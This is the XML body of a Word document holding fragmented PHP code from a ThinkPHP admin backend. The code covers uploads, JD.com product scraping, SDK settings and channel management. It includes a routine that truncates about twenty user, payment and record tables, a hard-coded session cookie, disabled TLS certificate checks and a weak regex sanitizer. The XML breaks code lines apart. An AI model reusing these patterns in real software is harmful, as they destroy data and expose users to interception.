    <w:p w14:paraId="23E7C8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'persistentNotifyUrl' =&gt; $wenurl.'/index.php/api/index/notify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0394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637B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$uptoken = $auth-&gt;uploadToken($bucket, null, 3600, $policy);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15815C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request()-&gt;file('video');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED419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49F151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49CEE0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$uploadMgr-&gt;putFile($uptoken, null, $filePath);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2081B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2B6136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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6726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F36F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json_encode(['ret'=&gt;$ret['key']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A93DD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9B2A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CC9AD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$this-&gt;fetch('uploadvideo');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30052E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1E42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0EC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shanchu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A74AE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59477D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fx_article");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269FB2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fx_article_ping");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5785CD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fx_article_ping_xia");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431F79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fx_article_ping_xia_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298108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fx_article_ping_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56313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fx_article_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394C9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fx_code");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0061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fx_jubao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA97D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002DA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fx_member_band");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73338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fx_member_fangke");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD95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fx_member_favorite");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9D0D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fx_member_guanzhu");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531601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fx_member_records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E340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fx_pay_record");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC5CF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Db::query("truncate table fx_tz_zan");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BADE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fx_yaoqing");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D5E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fx_yaoqing_records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B10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fx_shoplist_records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2834E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fx_shoplist");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF2D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fx_qiandao");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085E13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fx_diaocha_user");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B2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fx_member_zhibo");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDCF3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fx_member_tixian");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D877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fx_member_records");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F406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Db::query("truncate table fx_member_zhibo_liwu_list");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A8B6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78EF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caijiImgList(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12810B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$url=input('url');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB185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preg_match_all("/\/\/item.jd.com\/(.*?).html/",$url,$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645522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$url=$url[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31264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$url=$url[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDB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if(!$url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B8B2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33984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5DCF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$html=$this-&gt;get('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEF6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$html=json_decode($html,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B8EB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$html=$html['ware'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1841BD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$data['title']=$html['wname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AC0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($html['images'] as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1089AF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$img=str_replace('n0/jfs','n1/s400x400_jfs',$v['bigpath']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16DA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$img=str_replace('!q70.jpg','',$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D44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$imgs[]=$this-&gt;imgUrl($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6533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656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$data['images']=$imgs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2066DA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$str=$html['wdisHtml'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D974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$str=preg_replace("/\s+/", " ", $str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45596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 ]+/si","&lt;",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1215FB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$str=preg_replace("/&lt;\!–.*?–&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7053C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$str=preg_replace("/&lt;(\!.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B39E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$str=preg_replace("/&lt;(\/?html.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1ED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$str=preg_replace("/&lt;(\/?div.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="799EA2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$str=preg_replace("/&lt;(\/?a.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D6A8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$str=preg_replace("/&lt;(\/?head.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271C15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$str=preg_replace("/&lt;(\/?meta.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7FC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$str=preg_replace("/&lt;(\/?body.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CFD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$str=preg_replace("/&lt;(\/?link.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061955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$str=preg_replace("/&lt;(\/?form.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F04D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$str=preg_replace("/cookie/si","COOKIE",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC8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$str=preg_replace("/&lt;(applet.*?)&gt;(.*?)&lt;(\/applet.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E821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$str=preg_replace("/&lt;(\/?applet.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957C9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$str=preg_replace("/&lt;(style.*?)&gt;(.*?)&lt;(\/style.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CB27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$str=preg_replace("/&lt;(\/?style.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C80A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$str=preg_replace("/&lt;(title.*?)&gt;(.*?)&lt;(\/title.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BB1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$str=preg_replace("/&lt;(\/?title.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FC6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$str=preg_replace("/&lt;(object.*?)&gt;(.*?)&lt;(\/object.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719B5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$str=preg_replace("/&lt;(\/?objec.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60654C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$str=preg_replace("/&lt;(noframes.*?)&gt;(.*?)&lt;(\/noframes.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292321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$str=preg_replace("/&lt;(\/?noframes.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B60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$str=preg_replace("/&lt;(i?frame.*?)&gt;(.*?)&lt;(\/i?frame.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3996F0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$str=preg_replace("/&lt;(\/?i?frame.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8F94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$str=preg_replace("/&lt;(script.*?)&gt;(.*?)&lt;(\/script.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154B2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$str=preg_replace("/&lt;(\/?script.*?)&gt;/si","",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051EA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$str=preg_replace("/javascript/si","Javascript",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A46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$str=preg_replace("/vbscript/si","Vbscript",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA21B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$str=preg_replace("/on([a-z]+)\s*=/si","On\\1=",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150BD4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$str=preg_replace("/&amp;#/si","&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＃</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">",$str); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E200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$data['text']=$str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562C40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$money=$this-&gt;get('https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1AD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preg_match("/name=\"jdPrice\" value=\"(.*?)\"\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277ABD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$data['money']=$money['1'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACE3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4484B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094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get($url){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C0F5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 = curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAA1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CURLOPT_HTTPHEADER, array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1961C7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"Host:item.m.jd.com",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FB0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"Connection: keep-alive",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83A2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"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F14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"Upgrade-Insecure-Requests: 1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF6AF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"DNT:1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B0DC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"Accept-Language: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30098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'Cookie:JAMCookie=true; __jda=.882330932.1512470771.1512470771.1512470771.0; abtest=20180105154902515_40; mobilev=html5; USER_FLAG_CHECK=9d87ddea2df2d7308a7c613b248569c0; sid=2ad987cecf149a91a4fd89b1b301503f',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B51A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D81B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CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049DE0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CURLOPT_REFERER,$url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A74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CURLOPT_ENCODING, "gzip, deflate, br");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AD4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CURLOPT_FOLLOWLOCATION, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF4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CURLOPT_URL, $url);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E5C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CURLOPT_TIMEOUT,30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C0C7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CURLOPT_RETURNTRANSFER, 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB87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CURLOPT_SSL_VERIFYPEER, FALSE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252BB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CURLOPT_SSL_VERIFYHOST, 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180BF3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curl_exec($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7DC7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curl_close($ch);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D571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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DA14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59FB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imgUrl($img){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C21F9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$d=ROOT_PATH . 'public/uploads/shopimg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69C3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$date=date('Ymd');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7DF2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$d=$d.'/'.$date.'/';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD09D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if(!file_exists($d)){ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A257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mkdir($d);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797014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BCBD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$img=file_get_contents($img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B2C7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039C6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236BF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2754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$rand=rand(10000,999999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D550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$geshis=md5($img).$rand.'.jpg';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77D5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$d=$d.'/'.$geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C39E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file_put_contents($d,$img);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ACBF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"/public/uploads/shopimg/".$date."/".$geshis;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75433A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2DD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html($url,$method='GET',$body=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE31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config()['apicloud'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C15B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$now = time();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D5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$httpheader = array(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52603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"X-APICloud-AppId: ".$config['appid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508364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"X-APICloud-AppKey: ".sha1($config['appid']."UZ".$config['appkey']."UZ".$now).".".$now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB2F2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125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$curl=curl_init();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA3A4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'https:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E8F3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CURLOPT_URL, $url); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCC64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CURLOPT_CUSTOMREQUEST, $method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25446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CURLOPT_HTTPHEADER , array("X-HTTP-Method-Override: $method"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCA43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CURLOPT_HTTPHEADER , $httpheader);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29840D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CURLOPT_SSL_VERIFYPEER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C9A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CURLOPT_SSL_VERIFYHOST, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6080E0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CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3F5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CURLOPT_AUTOREFERER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E24C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CURLOPT_POSTFIELDS, $body); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA7A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CURLOPT_TIMEOUT, 30); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474FA1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CURLOPT_HEADER, 0); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F7A7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CURLOPT_RETURNTRANSFER, 1); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDB0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$totalline = curl_exec($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2301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(curl_errno($curl)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F77D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'Errno'.curl_error($curl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B911D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369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curl_close($curl); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB42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$totalline; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B29C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D4D1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getAppStatisticDataById(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E753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date('Y-m-d');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3CF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$this-&gt;html('getAppStatisticDataById','POST',['startDate'=&gt;$date,'endDate'=&gt;$date]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9805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json_decode($url,true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917AE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if($data['st'] == 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9339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json($data['msg']['0']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2724A7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43AD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json(['err'=&gt;$data['msg']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F37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7D15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dump($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BD19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8FD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ED333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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6766D5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6F0CD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5AA1B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think\Cache;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086005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66C27C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app\api\model\Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B42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Sdk extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526F59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4C9C6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1BC6E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9D42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13A2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temp(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4150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$name=Db::name('member_config')-&gt;where('type','sdkTemp')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B327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$this-&gt;assign('data',$name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B01A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A7C5A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FBA74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4F263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($name as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07973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Db::name('member_config')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7EE1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9C9A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7FEF4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AC536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1ACF3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7754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EFB65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D83F6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A57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87579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B77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mobile(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238C5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$data=Db::name('member_config')-&gt;where('type','sdkMobile')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A883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37462B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A05DF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6E530A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02CB44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4B04AC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Db::name('member_config')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D54BF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3AFB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7CD62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F0FD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5DF548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DC5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0B20F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1A1C30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7320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9B94D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D10B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email(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BB1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$data=Db::name('member_config')-&gt;where('type','sdkEmail')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6EE7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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C313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0D226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29291A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28F493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49BAC0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Db::name('member_config')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C669A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41E9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26B829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220C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D777A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B272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7EF76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89041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229D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8101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16FD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emails(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FCF5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B6BDD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$Send = new Send;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540E03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$Send-&gt;email(['email'=&gt;input('post.username'),'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱测试成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B9F1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if($result !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5079F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测试失败，原因：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$result];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD41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4DA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['ret'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱测试成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE214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297E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DE9E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beecloud(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587CD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$data=Db::name('member_config')-&gt;where('type','sdkBeecloud')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479B3C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295E14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93EB4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5A558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0335FE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49801A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Db::name('member_config')-&gt;where('name',$v['name'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527987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4EE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3C890E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0ECBD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541BF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4CE5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0B05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4D37D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948A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D8D8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3416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qiniu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5513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$data=Db::name('member_config')-&gt;where('type','sdkQiniu')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E670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787F58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87AAF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25B197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if($post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291855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258D6B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Db::name('member_config')-&gt;where(['name'=&gt;$v['name'],'type'=&gt;'sdkQiniu'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4FAF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0418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7929DB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5C63A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0C6B3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F16F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643EB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66A0A8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66A0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8178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D07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wxLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33B8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$data=Db::name('member_config')-&gt;where('type','wxLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24470F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552CB9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FDB8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47023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2CFFF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73D375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Db::name('member_config')-&gt;where(['name'=&gt;$v['name'],'type'=&gt;'wxLogin'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123F4E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B02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7D5793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3D5A0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5576CE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DB2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74759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074496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60B3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1CEAA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6204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qqLogin(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5402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$data=Db::name('member_config')-&gt;where('type','qqLogin')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FD9F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2CCEE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7BDFD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6EA9EE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081F16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2BB332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Db::name('member_config')-&gt;where(['name'=&gt;$v['name'],'type'=&gt;'qqLogin'])-&gt;setField('text',$post[$v['name']]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149496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5A1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5129BC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939C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97700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546F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3502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$data=$this-&gt;fetch();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C5A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3EC3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BDEBE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5116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0CB7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7F138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4C193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7E45B4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533C45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Mychannel extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3089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324B9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72E766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$data=Db::name('mychannel')-&gt;order('id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A98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$this-&gt;assign('data',$data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5888BE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0FC99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9042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4A5EC9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$id=input("id");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315C5B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F2A16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CA5F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165C2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69714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$titledb=Db::name('mychannel')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABAEA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2FB019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轮播图标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C0EE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9D3E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$db=Db::name('mychannel')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7869C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CAA76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028028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9A20E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29118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0031C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3267A5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$db=Db::name('mychannel')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3AC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1E9A5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5B817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1175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48BF6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38E6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E14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CECE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751F8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$name=Db::name('mychannel')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC8C2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26E4CB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325BB4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32DA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A782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2552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DED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572282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00E5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$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57739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AD6C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5D354D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0EAC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2B21E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4FC8F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$typeid=Db::name('typeid')-&gt;where('mychannel',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB043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if(!$typeid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07094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$db=Db::name('mychannel')-&gt;delete($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0999C3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AFF3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5B499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12C49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0AFBC2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771EF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8F6B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模型下有栏目，请先删除栏目对应模型</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8456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BF172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8BA7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4AF4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9FF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BD13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64A7A3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3BD3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81BF1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178C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9882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8655E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33DC7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2C940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5EB45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6DE129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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FE38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Qiniu\Storage\BucketManager;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BCDA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281D1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Circle extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5057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B366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types()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2128E7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423B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$types = Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9CD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07D3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$types);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB743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AB69B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751F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3524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D8F3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input('param.type_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751561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Db::name('circle_type')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5050A3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$type_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40998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E0D9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 $type);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B320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A33B4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CA576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add_type()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CF63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334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301C75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4EDE0E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37D7B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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D7B1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35B265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17DC64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$circle_type = Db::name('circle_type')-&gt;where('title', $post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D193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($circle_type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAAC1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标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6A1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338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 = $time; </w:t>
      </w:r>
    </w:p>
